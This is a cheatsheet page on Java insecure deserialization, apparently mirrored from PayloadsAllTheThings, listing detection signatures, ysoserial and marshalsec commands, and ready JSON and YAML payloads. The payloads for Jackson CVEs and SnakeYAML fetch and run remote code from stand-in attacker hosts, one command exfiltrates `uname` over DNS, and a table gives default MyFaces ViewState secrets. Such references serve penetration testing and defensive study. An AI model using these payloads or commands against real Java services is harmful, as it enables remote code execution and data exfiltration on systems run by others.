daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

java.md (25011B)


      1 ---
      2 title: "Java Deserialization"
      3 topic: "Insecure Deserialization"
      4 topicSlug: "insecure-deserialization"
      5 sourcePath: "Insecure Deserialization/Java.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Insecure%20Deserialization/Java.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # Java Deserialization
     12 
     13 > Java serialization is the process of converting a Java object’s state into a byte stream, which can be stored or transmitted and later reconstructed (deserialized) back into the original object. Serialization in Java is primarily done using the `Serializable` interface, which marks a class as serializable, allowing it to be saved to files, sent over a network, or transferred between JVMs.
     14 
     15 ## Summary
     16 
     17 * [Detection](#detection)
     18 * [Tools](#tools)
     19     * [Ysoserial](#ysoserial)
     20     * [Burp extensions using ysoserial](#burp-extensions)
     21     * [Alternative Tooling](#alternative-tooling)
     22 * [YAML Deserialization](#yaml-deserialization)
     23 * [ViewState](#viewstate)
     24 * [References](#references)
     25 
     26 ## Detection
     27 
     28 * `"AC ED 00 05"` in Hex
     29     * `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol.
     30     * `00 05`: STREAM_VERSION. The serialization version.
     31 * `"rO0"` in Base64
     32 * `Content-Type` = "application/x-java-serialized-object"
     33 * `"H4sIAAAAAAAAAJ"` in gzip(base64)
     34 
     35 ## Tools
     36 
     37 ### Ysoserial
     38 
     39 [frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
     40 
     41 ```java
     42 java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
     43 java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
     44 java -jar ysoserial.jar Groovy1 'ping 127.0.0.1' > payload.bin
     45 java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
     46 ```
     47 
     48 **List of payloads included in ysoserial:**
     49 
     50 | Payload             | Authors                                | Dependencies                                                                                                                                                                                         |
     51 | ------------------- | -------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
     52 | AspectJWeaver       | @Jang                                  | aspectjweaver:1.9.2, commons-collections:3.2.2                                                                                                                                                       |
     53 | BeanShell1          | @pwntester, @cschneider4711            | bsh:2.0b5                                                                                                                                                                                            |
     54 | C3P0                | @mbechler                              | c3p0:0.9.5.2, mchange-commons-java:0.2.11                                                                                                                                                            |
     55 | Click1              | @artsploit                             | click-nodeps:2.3.0, javax.servlet-api:3.1.0                                                                                                                                                          |
     56 | Clojure             | @JackOfMostTrades                      | clojure:1.8.0                                                                                                                                                                                        |
     57 | CommonsBeanutils1   | @frohoff                               | commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2                                                                                                                                |
     58 | CommonsCollections1 | @frohoff                               | commons-collections:3.1                                                                                                                                                                              |
     59 | CommonsCollections2 | @frohoff                               | commons-collections4:4.0                                                                                                                                                                             |
     60 | CommonsCollections3 | @frohoff                               | commons-collections:3.1                                                                                                                                                                              |
     61 | CommonsCollections4 | @frohoff                               | commons-collections4:4.0                                                                                                                                                                             |
     62 | CommonsCollections5 | @matthias_kaiser, @jasinner            | commons-collections:3.1                                                                                                                                                                              |
     63 | CommonsCollections6 | @matthias_kaiser                       | commons-collections:3.1                                                                                                                                                                              |
     64 | CommonsCollections7 | @scristalli, @hanyrax, @EdoardoVignati | commons-collections:3.1                                                                                                                                                                              |
     65 | FileUpload1         | @mbechler                              | commons-fileupload:1.3.1, commons-io:2.4                                                                                                                                                             |
     66 | Groovy1             | @frohoff                               | groovy:2.3.9                                                                                                                                                                                         |
     67 | Hibernate1          | @mbechler                              |                                                                                                                                                                                                      |
     68 | Hibernate2          | @mbechler                              |                                                                                                                                                                                                      |
     69 | JBossInterceptors1  | @matthias_kaiser                       | javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                                             |
     70 | JRMPClient          | @mbechler                              |                                                                                                                                                                                                      |
     71 | JRMPListener        | @mbechler                              |                                                                                                                                                                                                      |
     72 | JSON1               | @mbechler                              | json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 |
     73 | JavassistWeld1      | @matthias_kaiser                       | javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                                                         |
     74 | Jdk7u21             | @frohoff                               |                                                                                                                                                                                                      |
     75 | Jython1             | @pwntester, @cschneider4711            | jython-standalone:2.5.2                                                                                                                                                                              |
     76 | MozillaRhino1       | @matthias_kaiser                       | js:1.7R2                                                                                                                                                                                             |
     77 | MozillaRhino2       | @_tint0                                | js:1.7R2                                                                                                                                                                                             |
     78 | Myfaces1            | @mbechler                              |                                                                                                                                                                                                      |
     79 | Myfaces2            | @mbechler                              |                                                                                                                                                                                                      |
     80 | ROME                | @mbechler                              | rome:1.0                                                                                                                                                                                             |
     81 | Spring1             | @frohoff                               | spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE                                                                                                                                                |
     82 | Spring2             | @mbechler                              | spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2                                                                                                            |
     83 | URLDNS              | @gebl                                  |                                                                                                                                                                                                      |
     84 | Vaadin1             | @kai_ullrich                           | vaadin-server:7.7.14, vaadin-shared:7.7.14                                                                                                                                                           |
     85 | Wicket1             | @jacob-baines                          | wicket-util:6.23.0, slf4j-api:1.6.4                                                                                                                                                                  |
     86 
     87 ### Burp extensions
     88 
     89 * [NetSPI/JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller) -  Burp extension to perform Java Deserialization Attacks
     90 * [federicodotta/Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner) -  All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities
     91 * [summitt/burp-ysoserial](https://github.com/summitt/burp-ysoserial) -  YSOSERIAL Integration with Burp Suite
     92 * [DirectDefense/SuperSerial](https://github.com/DirectDefense/SuperSerial) - Burp Java Deserialization Vulnerability Identification
     93 * [DirectDefense/SuperSerial-Active](https://github.com/DirectDefense/SuperSerial-Active) - Java Deserialization Vulnerability Active Identification Burp Extender
     94 
     95 ### Alternative Tooling
     96 
     97 * [pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget) - Pure JRE 8 RCE Deserialization gadget
     98 * [joaomatosf/JexBoss](https://github.com/joaomatosf/jexboss) - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool
     99 * [pimps/ysoserial-modified](https://github.com/pimps/ysoserial-modified) - A fork of the original ysoserial application
    100 * [NickstaDB/SerialBrute](https://github.com/NickstaDB/SerialBrute) - Java serialization brute force attack tool
    101 * [NickstaDB/SerializationDumper](https://github.com/NickstaDB/SerializationDumper) - A tool to dump Java serialization streams in a more human readable form
    102 * [bishopfox/gadgetprobe](https://labs.bishopfox.com/gadgetprobe) - Exploiting Deserialization to Brute-Force the Remote Classpath
    103 * [k3idii/Deserek](https://github.com/k3idii/Deserek) - Python code to Serialize and Unserialize java binary serialization format.
    104 
    105   ```java
    106   java -jar ysoserial.jar URLDNS http://xx.yy > yss_base.bin
    107   python deserek.py yss_base.bin --format python > yss_url.py
    108   python yss_url.py yss_new.bin
    109   java -cp JavaSerializationTestSuite DeSerial yss_new.bin
    110   ```
    111 
    112 * [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Java Unmarshaller Security - Turning your data into code execution
    113 
    114   ```java
    115   $ java -cp marshalsec.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
    116   $ java -cp marshalsec.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc"
    117   $ java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389
    118   // -a - generates/tests all payloads for that marshaller
    119   // -t - runs in test mode, unmarshalling the generated payloads after generating them.
    120   // -v - verbose mode, e.g. also shows the generated payload in test mode.
    121   // gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller.
    122   // arguments - Gadget specific arguments
    123   ```
    124 
    125 Payload generators for the following marshallers are included:
    126 
    127 | Marshaller                  | Gadget Impact                                                                |
    128 | --------------------------- | ---------------------------------------------------------------------------- |
    129 | BlazeDSAMF(0&#124;3&#124;X) | JDK only escalation to Java serialization various third party libraries RCEs |
    130 | Hessian&#124;Burlap         | various third party RCEs                                                     |
    131 | Castor                      | dependency library RCE                                                       |
    132 | Jackson                     | **possible JDK only RCE**, various third party RCEs                          |
    133 | Java                        | yet another third party RCE                                                  |
    134 | JsonIO                      | **JDK only RCE**                                                             |
    135 | JYAML                       | **JDK only RCE**                                                             |
    136 | Kryo                        | third party RCEs                                                             |
    137 | KryoAltStrategy             | **JDK only RCE**                                                             |
    138 | Red5AMF(0&#124;3)           | **JDK only RCE**                                                             |
    139 | SnakeYAML                   | **JDK only RCEs**                                                            |
    140 | XStream                     | **JDK only RCEs**                                                            |
    141 | YAMLBeans                   | third party RCE                                                              |
    142 
    143 ## JSON Deserialization
    144 
    145 Multiple libraries can be used to handle JSON in Java.
    146 
    147 * [json-io](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#json-io-json)
    148 * [Jackson](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#jackson-json)
    149 * [Fastjson](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#fastjson-json)
    150 * [Genson](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json)
    151 * [Flexjson](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#flexjson-json)
    152 * [Jodd](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#jodd-json)
    153 
    154 **Jackson**:
    155 
    156 Jackson is a popular Java library used for working with JSON (JavaScript Object Notation) data.
    157 Jackson-databind supports Polymorphic Type Handling (PTH), formerly known as "Polymorphic Deserialization", which is disabled by default.
    158 
    159 To determine if the backend is using Jackson, the most common technique is to send an invalid JSON and inspect the error message. Look for references to either of those:
    160 
    161 ```java
    162 Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object
    163 ```
    164 
    165 * com.fasterxml.jackson.databind
    166 * org.codehaus.jackson.map
    167 
    168 **Exploitation**:
    169 
    170 * **CVE-2017-7525**
    171 
    172   ```json
    173   {
    174     "param": [
    175       "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    176       {
    177         "transletBytecodes": [
    178           "yv66v[JAVA_CLASS_B64_ENCODED]AIAEw=="
    179         ],
    180         "transletName": "a.b",
    181         "outputProperties": {}
    182       }
    183     ]
    184   }
    185     ```
    186 
    187 * **CVE-2017-17485**
    188 
    189   ```json
    190   {
    191     "param": [
    192       "org.springframework.context.support.FileSystemXmlApplicationContext",
    193       "http://evil/spel.xml"
    194     ]
    195   }
    196   ```
    197 
    198 * **CVE-2019-12384**
    199 
    200   ```json
    201   [
    202     "ch.qos.logback.core.db.DriverManagerConnectionSource", 
    203     {
    204       "url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'"
    205     }
    206   ]
    207   ```
    208 
    209 * **CVE-2020-36180**
    210 
    211   ```json
    212   [
    213     "org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS",
    214     {
    215       "url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://evil:3333/exec.sql'"
    216     }
    217   ]
    218   ```
    219 
    220 * **CVE-2020-9548**
    221 
    222     ```json
    223     [
    224       "br.com.anteros.dbcp.AnterosDBCPConfig",
    225       {
    226         "healthCheckRegistry": "ldap://{{interactsh-url}}"
    227       }
    228     ]
    229     ```
    230 
    231 ## YAML Deserialization
    232 
    233 * [SnakeYAML](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#snakeyaml-yaml)
    234 * [jYAML](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#jyaml-yaml)
    235 * [YamlBeans](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#yamlbeans-yaml)
    236 
    237 **SnakeYAML**:
    238 
    239 SnakeYAML is a popular Java-based library used for parsing and emitting YAML (YAML Ain't Markup Language) data. It provides an easy-to-use API for working with YAML, a human-readable data serialization standard commonly used for configuration files and data exchange.
    240 
    241 ```yaml
    242 !!javax.script.ScriptEngineManager [
    243   !!java.net.URLClassLoader [[
    244     !!java.net.URL ["http://attacker-ip/"]
    245   ]]
    246 ]
    247 ```
    248 
    249 ## ViewState
    250 
    251 In Java, ViewState refers to the mechanism used by frameworks like JavaServer Faces (JSF) to maintain the state of UI components between HTTP requests in web applications. There are 2 major implementations:
    252 
    253 * Oracle Mojarra (JSF reference implementation)
    254 * Apache MyFaces
    255 
    256 **Tools**:
    257 
    258 * [joaomatosf/jexboss](https://github.com/joaomatosf/jexboss) - JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
    259 * [Synacktiv-contrib/inyourface](https://github.com/Synacktiv-contrib/inyourface) - InYourFace is a software used to patch unencrypted and unsigned JSF ViewStates.
    260 
    261 ### Encoding
    262 
    263 | Encoding      | Starts with |
    264 | ------------- | ----------- |
    265 | base64        | `rO0`       |
    266 | base64 + gzip | `H4sIAAA`   |
    267 
    268 ### Storage
    269 
    270 The `javax.faces.STATE_SAVING_METHOD` is a configuration parameter in JavaServer Faces (JSF). It specifies how the framework should save the state of a component tree (the structure and data of UI components on a page) between HTTP requests.
    271 
    272 The storage method can also be inferred from the viewstate representation in the HTML body.
    273 
    274 * **Server side** storage: `value="-XXX:-XXXX"`
    275 * **Client side** storage: `base64 + gzip + Java Object`
    276 
    277 ### Encryption
    278 
    279 By default MyFaces uses DES as encryption algorithm and HMAC-SHA1 to authenticate the ViewState. It is possible and recommended to configure more recent algorithms like AES and HMAC-SHA256.
    280 
    281 | Encryption Algorithm | HMAC      |
    282 | -------------------- | --------- |
    283 | DES ECB (default)    | HMAC-SHA1 |
    284 
    285 Supported encryption methods are BlowFish, 3DES, AES and are defined by a context parameter.
    286 The value of these parameters and their secrets can be found inside these XML clauses.
    287 
    288 ```xml
    289 <param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>   
    290 <param-name>org.apache.myfaces.SECRET</param-name>   
    291 <param-name>org.apache.myfaces.MAC_SECRET</param-name>
    292 ```
    293 
    294 Common secrets from the [documentation](https://cwiki.apache.org/confluence/display/MYFACES2/Secure+Your+Application).
    295 
    296 | Name                 | Value                              |
    297 | -------------------- | ---------------------------------- |
    298 | AES CBC/PKCS5Padding | `NzY1NDMyMTA3NjU0MzIxMA==`         |
    299 | DES                  | `NzY1NDMyMTA=<`                    |
    300 | DESede               | `MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz` |
    301 | Blowfish             | `NzY1NDMyMTA3NjU0MzIxMA`           |
    302 | AES CBC              | `MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz` |
    303 | AES CBC IV           | `NzY1NDMyMTA3NjU0MzIxMA==`         |
    304 
    305 * **Encryption**: Data -> encrypt -> hmac_sha1_sign -> b64_encode -> url_encode -> ViewState
    306 * **Decryption**: ViewState -> url_decode -> b64_decode -> hmac_sha1_unsign -> decrypt -> Data
    307 
    308 ## References
    309 
    310 * [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau - March 22, 2017](https://web.archive.org/web/20230927142712/https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
    311 * [Exploiting the Jackson RCE: CVE-2017-7525 - Adam Caudill - October 4, 2017](https://web.archive.org/web/20260303123815/https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/)
    312 * [Hack The Box - Arkham - 0xRick - August 10, 2019](https://web.archive.org/web/20251125134359/https://0xrick.github.io/hack-the-box/arkham/)
    313 * [How I found a $1500 worth Deserialization vulnerability - Ashish Kunwar - August 28, 2018](https://web.archive.org/web/20250918030712/https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
    314 * [Jackson CVE-2019-12384: anatomy of a vulnerability class - Andrea Brancaleoni - July 22, 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
    315 * [Jackson gadgets - Anatomy of a vulnerability - Andrea Brancaleoni - July 22, 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
    316 * [Jackson Polymorphic Deserialization - FasterXML - July 23, 2020](https://github.com/FasterXML/jackson-docs/wiki/JacksonPolymorphicDeserialization)
    317 * [Java Deserialization Cheat Sheet - Aleksei Tiurin - May 23, 2023](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
    318 * [Java Deserialization in ViewState - Haboob Team - December 23, 2020](https://web.archive.org/web/20250909154616/https://www.exploit-db.com/docs/48126)
    319 * [JSF ViewState upside-down - Renaud Dubourguais, Nicolas Collignon - March 15, 2016](https://web.archive.org/web/20160315020109/http://synacktiv.com/ressources/JSF_ViewState_InYourFace.pdf)
    320 * [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - Peter Stöckli - August 14, 2017](https://web.archive.org/web/20181217131654/https://alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
    321 * [On Jackson CVEs: Don’t Panic — Here is what you need to know - cowtowncoder - December 22, 2017](https://web.archive.org/web/20201207032909/https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)
    322 * [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin (@artsploit) - June 29, 2021](https://web.archive.org/web/20260210022416/https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)
    323 * [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com - July 5, 2020](https://web.archive.org/web/20250604040229/https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
    324 * [Understanding & practicing java deserialization exploits - Diablohorn - September 9, 2017](https://web.archive.org/web/20250604034046/https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
    325 * [Friday the 13th JSON Attacks - Alvaro Muñoz & Oleksandr Mirosh - July 28, 2017](https://web.archive.org/web/20170728193005/https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)